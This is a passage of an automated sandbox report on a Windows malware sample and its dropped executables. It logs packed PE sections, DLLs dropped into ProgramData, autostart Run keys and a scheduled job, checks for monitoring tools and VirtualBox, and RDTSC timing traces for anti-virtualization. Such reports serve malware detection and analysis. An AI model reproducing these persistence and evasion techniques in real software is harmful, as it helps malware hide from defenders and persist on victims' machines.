Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA9BBF push edi; retf 14_3_05EA9BCF
Source: file.exe Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: entropy: 7.977427929037122
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: brwftgiw entropy: 7.953765589364572
Source: random[1].exe.0.dr Static PE information: section name: bgrcdjci entropy: 7.955794743313823
Source: skotes.exe.9.dr Static PE information: section name: entropy: 7.977427929037122
Source: skotes.exe.9.dr Static PE information: section name: brwftgiw entropy: 7.953765589364572
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: bgrcdjci entropy: 7.955794743313823
Source: random[1].exe.11.dr Static PE information: section name: entropy: 7.9810982340478365
Source: random[1].exe.11.dr Static PE information: section name: ackgsmri entropy: 7.9522925372316715
Source: 0718eb7837.exe.11.dr Static PE information: section name: entropy: 7.9810982340478365
Source: 0718eb7837.exe.11.dr Static PE information: section name: ackgsmri entropy: 7.9522925372316715
Source: random[1].exe0.11.dr Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: aedbd2e320.exe.11.dr Static PE information: section name: wkrmqwho entropy: 7.952864743904478
Source: random[2].exe.11.dr Static PE information: section name: entropy: 7.7983145671747005
Source: 2aff342b40.exe.11.dr Static PE information: section name: entropy: 7.7983145671747005

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsKECFIDGCBF.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsKECFIDGCBF.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsKECFIDGCBF.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe Jump to behavior
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsKECFIDGCBF.exe Jump to dropped file
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5FF16 second address: E5FF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5FF1A second address: E5FF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD5B3 second address: FCD5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBD57F second address: FBD584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBD584 second address: FBD589 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC7C7 second address: FCC7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F70146AC606h 0x0000000f jmp 00007F70146AC613h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC7E9 second address: FCC7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC7EF second address: FCC7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F70146AC606h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC7FD second address: FCC807 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF4E second address: FCEF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF5E second address: FCEF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF63 second address: FCEF69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF69 second address: FCEF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF6D second address: FCEF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF71 second address: FCEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF82 second address: FCEF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCEF86 second address: FCEFF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F7014CC2CC1h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 ja 00007F7014CC2CC6h 0x0000001b pop eax 0x0000001c sub edi, dword ptr [ebp+122D35EDh] 0x00000022 push 00000003h 0x00000024 add dx, 8B6Bh 0x00000029 push 00000000h 0x0000002b mov ecx, 3E6B0A24h 0x00000030 push 00000003h 0x00000032 sub dword ptr [ebp+122D1AFAh], ebx 0x00000038 push D8566F87h 0x0000003d jnc 00007F7014CC2CC4h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
